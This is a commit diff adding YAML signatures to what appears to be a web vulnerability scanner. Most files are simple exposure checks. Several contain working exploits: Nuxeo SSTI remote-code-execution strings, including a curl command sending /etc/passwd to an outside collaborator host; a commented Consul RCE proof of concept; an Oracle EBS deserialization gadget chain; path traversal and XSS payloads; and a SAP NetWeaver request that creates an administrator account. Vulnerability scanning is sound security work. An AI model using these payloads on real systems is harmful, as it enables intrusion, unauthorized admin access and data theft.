Merge pull request #1 from jaeles-project/master

update changes from project
jaeles-project · Sep 5, 2020 · ad03117 · ad03117
2 parents a1b54fb + 344b0ba
commit ad03117
Show file tree

Hide file tree

Showing 18 changed files with 479 additions and 6 deletions.
diff --git a/common/gloo-unauth.yaml b/common/gloo-unauth.yaml
@@ -0,0 +1,23 @@
+id: gloo-unauth
+info:
+  name: Gloo UI Unauthentication
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-type: application/grpc-web+proto
+      - Referer: '{{.root}}/admin/'
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeader", 'application/grpc-web+proto') && StringSearch("body", 'gke-remote')
+
+references:
+  - repo: https://github.com/containous/traefik
diff --git a/common/gogs-install-exposure.yaml b/common/gogs-install-exposure.yaml
@@ -0,0 +1,21 @@
+id: gogs-install-exposure
+info:
+  name: Gogs install exposure
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/install
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", 'Gogs') && StringSearch("response", 'General Settings') && StringSearch("response", 'Database Settings')
+
+references:
+  - repo: https://github.com/gogs/gogs
diff --git a/common/hasicorp-consul-rce.yaml b/common/hasicorp-consul-rce.yaml
@@ -0,0 +1,54 @@
+id: hasicorp-consul-rce
+info:
+  name: Hashicorp Consul RCE
+  risk: Potential
+
+params:
+  - root: "{{.BaseURL}}"
+  - dest: "t3xc2xpi6jd3rwpz7jgc4w4s2j8dw2.burpcollaborator.net"
+
+variables:
+  - ran: RandomString(6)
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/v1/agent/self
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && (StringSearch("body", '"EnableScriptChecks":true') || StringSearch("body", '"EnableRemoteScriptChecks":true') || StringSearch("body", '"DisableRemoteExec":false'))
+
+  ### below is real RCE poc
+  # - method: PUT
+  #   redirect: false
+  #   url: >-
+  #     {{.root}}/v1/session/create
+  #   headers:
+  #     - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+  #     - X-Consul-Token: ''
+  #   body: |
+  #     {"ID":"{{.ran}}","Name":"{{.ran}}","Address":"127.0.0.1","Port":80,"check":{"script":"nslookup {{.Domain}}.{{.dest}}","interval":"10s"}}
+  #   detections:
+  #     - >-
+  #       StatusCode() == 200 && (StringSearch("body", '"EnableScriptChecks":true') || StringSearch("body", '"EnableRemoteScriptChecks":true') || StringSearch("body", '"DisableRemoteExec":false'))
+
+  # - method: PUT
+  #   redirect: false
+  #   url: >-
+  #     {{.root}}/v1/agent/service/register
+  #   headers:
+  #     - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+  #     - X-Consul-Token: ''
+  #   body: |
+  #     {"ID":"{{.ran}}","Name":"{{.ran}}","Address":"127.0.0.1","Port":80,"check":{"script":"nslookup {{.Domain}}.{{.dest}}","Args":["sh","-c","nslookup {{.Domain}}.{{.dest}}"],"interval":"10s","Timeout":"86400s"}}
+  #   detections:
+  #     - >-
+  #       StatusCode() == 200 && (StringSearch("body", '"EnableScriptChecks":true') || StringSearch("body", '"EnableRemoteScriptChecks":true') || StringSearch("body", '"DisableRemoteExec":false'))
+
+
+references:
+  - link1: https://www.exploit-db.com/exploits/46073
+  - link2: https://www.exploit-db.com/exploits/46074
diff --git a/common/kafka-misconfig.yaml b/common/kafka-misconfig.yaml
@@ -0,0 +1,18 @@
+id: common-kafka-misconfig-01
+info:
+  name: Kafka Manger Misconfig
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "Kafka Manager") && StringSearch("body", "/addCluster")
diff --git a/common/netdata-unauth.yaml b/common/netdata-unauth.yaml
@@ -0,0 +1,21 @@
+id: netdata-unauth-01
+info:
+  name: Netdata Unauth
+  risk: Medium
+
+params:
+  - root: '{{.BaseURL}}'
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && && StringSearch("resHeaders", "application/json") && StringSearch("response", "view_update_every") && StringSearch("response", "dimensions")
+
+references:
+  - repo: https://github.com/netdata/netdata
diff --git a/common/nuxeo-ssti-rce.yaml b/common/nuxeo-ssti-rce.yaml
@@ -0,0 +1,34 @@
+id: nuxeo-ssti-rce
+info:
+  name: Nuxeo SSTI RCE - CVE-2018-16341
+  risk: Critical
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "facelet") && StringSearch("response", "1199135")
+
+references:
+  - link: https://github.com/mpgn/CVE-2018-16341
+  - link2: https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/
+  - rce: |
+      http://example.com/nuxeo/login.jsp/pwn${expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'pwd')))))}.xhtml
+  - rce2: |
+      GET /nuxeo/login.jsp/pwn${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl%20--data-binary%20@/etc/passwd%20xkl8uq9g5c7qnblke1tg153ppgv8jx.burpcollaborator.net",null).waitFor()}.xhtml HTTP/1.1
+      Host: target
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
+      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+      Accept-Language: en-US,en;q=0.5
+      Accept-Encoding: gzip, deflate
+      Connection: close
+      Upgrade-Insecure-Requests: 1
+
diff --git a/common/oracle-ebs-desr.yaml b/common/oracle-ebs-desr.yaml
@@ -0,0 +1,29 @@
+id: oracle-ebs-desr
+info:
+  name: Oracle EBS Deserialization
+  risk: High
+  confidence: Tentative
+
+params:
+  - root: "{{.BaseURL}}"
+  - data: "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAARzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEGphdmEubGFuZy5UaHJlYWQAAAAAAAAAAAAAAHhwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnZva2VyVHJhbnNmb3JtZXKH6P9re3zOOAIAA1sABWlBcmdzdAATW0xqYXZhL2xhbmcvT2JqZWN0O0wAC2lNZXRob2ROYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAVzbGVlcHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyAARsb25nAAAAAAAAAAAAAAB4cHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACdXEAfgAeAAAAAXEAfgAhdXEAfgAbAAAAAXNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAnEHQABmludm9rZXVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLk9iamVjdAAAAAAAAAAAAAAAeHB2cQB+ABtzcQB+ABFzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAsAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgA5"
+
+requests:
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}/OA_HTML/iesRuntimeServlet
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    body: |
+      {{ .data | b64dec }}
+    detections:
+      - >-
+        StatusCode() == 200 && ResponseTime() > 9 && StringSearch("body", "java.lang")
+
+references:
+  - links:
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+      - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
+      - https://github.com/sahabrifki/erpscan/blob/master/javaSerDetect.py
diff --git a/common/oracle-ebs-lfi.yaml b/common/oracle-ebs-lfi.yaml
@@ -0,0 +1,35 @@
+id: oracle-ebs-lfi
+info:
+  name: Oracle EBS bispgrapgh Path Traversal
+  risk: High
+  confidence: Certain
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", "root:") && StringSearch("body", "bin/bash")
+
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=win.ini&ifl=c:/windows/
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && (StringSearch("response", "[extensions]") || StringSearch("response", "[fonts]"))
+
+references:
+  - links:
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+      - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
diff --git a/common/oracle-ebs-xss.yaml b/common/oracle-ebs-xss.yaml
@@ -0,0 +1,31 @@
+id: oracle-ebs-xss
+info:
+  name: Oracle EBS XSS
+  risk: Medium
+  confidence: Tentative
+
+params:
+  - root: "{{.BaseURL}}"
+
+variables:
+  - endpoint: |
+      jtfLOVInProcess.jsp?AAA=AAAAAAAAAA'"><svg/onload=alert(2)>
+      oksAutoRenewalHelp.jsp?thanks='"><svg/onload=alert(2)>
+      ieuiMeetingErrorDisplay.jsp?ErrCode='"><svg/onload=alert(2)>
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/OA_HTML/{{.endpoint}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "text/html") && StringSearch("body", "<svg/onload=alert(2)>")
+
+references:
+  - links:
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+      - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+      - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
diff --git a/common/pinpoint-unauth.yaml b/common/pinpoint-unauth.yaml
@@ -0,0 +1,21 @@
+id: pinpoint-unauth-01
+info:
+  name: PinPoint Unauth
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/applications.pinpoint
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && && StringSearch("resHeaders", "application/json") && StringSearch("response", "applicationName") && StringSearch("response", "serviceType")
+
+references:
+  - repo: https://github.com/naver/pinpoint
diff --git a/common/sap-directory-listing.yaml b/common/sap-directory-listing.yaml
@@ -0,0 +1,24 @@
+id: sap-directory-listing
+info:
+  name: SAP Directory Listing
+  risk: Medium
+
+params:
+  - root: "{{.BaseURL}}"
+
+variables:
+  - prefix: |
+      /
+      /sap/
+  - path: |
+      irj/go/km/navigation/
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}{{.prefix}}{{.path}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "~system") && StringSearch("response", "Changed") && StringSearch("response", ".webdav.")
diff --git a/common/sap-netweaver-create-admin-user.yaml b/common/sap-netweaver-create-admin-user.yaml
@@ -0,0 +1,39 @@
+id: sap-netweaver-create-admin-user
+info:
+  name: SAP Create Admin User CVE-2020-6287
+  risk: Potential
+  confidence: Tentative
+
+params:
+  - root: "{{.BaseURL}}"
+  # this is base64 data
+  - data: "x"
+  # - data: "PHJvb3Q+PHVzZXI+PEphdmFPckFCQVA+amF2YTwvSmF2YU9yQUJBUD48dXNlcm5hbWU+c2FtcGxlMTwvdXNlcm5hbWU+PHBhc3N3b3JkPnBhc3N3b3JkMTwvcGFzc3dvcmQ+PHVzZXJUeXBlPkRpYWxvZzwvdXNlclR5cGU+PC91c2VyPjwvcm9vdD4="
+
+variables:
+  - prefix: |
+      /
+
+requests:
+  # create admin POC
+  # create user with credentials sample2:password1
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}{{.prefix}}CTCWebService/CTCWebServiceBean
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
+      - Content-Type: text/xml;charset=UTF-8
+      - Accept-Language: en-US,en;q=0.9
+      - Accept-Encoding: gzip, deflate
+    body: |
+      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:execute><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/PI_PCK/PCK/PCKProcess.cproc</path></identifier><contextMessages><baData>PFBDSz48VXNlcm1hbmFnZW1lbnQ+PFNBUF9YSV9QQ0tfQ09ORklHPjxyb2xlTmFtZT5BZG1pbmlzdHJhdG9yPC9yb2xlTmFtZT48L1NBUF9YSV9QQ0tfQ09ORklHPjxTQVBfWElfUENLX0NPTU1VTklDQVRJT04+PHJvbGVOYW1lPllFRkRXQlNqWU1DPC9yb2xlTmFtZT48L1NBUF9YSV9QQ0tfQ09NTVVOSUNBVElPTj48U0FQX1hJX1BDS19NT05JVE9SPjxyb2xlTmFtZT41azRvN2dYVUJqcEo1WTwvcm9sZU5hbWU+PC9TQVBfWElfUENLX01PTklUT1I+PFNBUF9YSV9QQ0tfQURNSU4+PHJvbGVOYW1lPm14YjJUTEtJVmU8L3JvbGVOYW1lPjwvU0FQX1hJX1BDS19BRE1JTj48UENLVXNlcj48dXNlck5hbWUgc2VjdXJlPSJ0cnVlIj5zYW1wbGUyPC91c2VyTmFtZT48cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5wYXNzd29yZDE8L3Bhc3N3b3JkPjwvUENLVXNlcj48UENLUmVjZWl2ZXI+PHVzZXJOYW1lPjVBUjFnMUxqbjk8L3VzZXJOYW1lPjxwYXNzd29yZCBzZWN1cmU9InRydWUiPmpXU1RFSEZ0MkQzY0RqUFE8L3Bhc3N3b3JkPjwvUENLUmVjZWl2ZXI+PFBDS01vbml0b3I+PHVzZXJOYW1lPkRPM1dPWHFpTFFUSjE8L3VzZXJOYW1lPjxwYXNzd29yZCBzZWN1cmU9InRydWUiPkJ3aEh0MFZoSEtObGk8L3Bhc3N3b3JkPjwvUENLTW9uaXRvcj48UENLQWRtaW4+PHVzZXJOYW1lPlZjWGxYbG9ZaHFXdnBWPC91c2VyTmFtZT48cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5qYU1HYzFEQ1VzVU1adGVNPC9wYXNzd29yZD48L1BDS0FkbWluPjwvVXNlcm1hbmFnZW1lbnQ+PC9QQ0s+</baData><name>Netweaver.PI_PCK.PCK</name></contextMessages></urn:execute></soapenv:Body></soapenv:Envelope>
+    detections:
+      - >-
+        StatusCode() == 500 && StringSearch("resHeaders", "text/xml") && StringSearch("response", "com.sap.tc.lm.ctc.metamodel.exception.XMLParsingException-Exception")
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "text/xml") && (StringSearch("response", "ns2:executeSynchroniousResponse") || StringSearch("response", "ns2:executeResponse"))
+
+references:
+  - links:
+      - https://github.com/rapid7/metasploit-framework/pull/13852
diff --git a/common/wordpress-directory-listing.yaml b/common/wordpress-directory-listing.yaml
@@ -11,6 +11,7 @@ variables:
       wp-includes/
       wp-includes/images/
       wp-content/
+      wp-content/uploads/
       wp-content/themes/
       wp-content/plugins/
       wp-content/plugins/hustle/views/admin/dashboard/

diff --git a/common/zipkin-auth.yaml b/common/zipkin-auth.yaml
@@ -0,0 +1,18 @@
+id: zippkin-unauth-01
+info:
+  name: zippkin unauth
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/config.json
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "{"environment"") && StringSearch("response", "defaultLookback") && StringSearch("resHeaders", "application/json")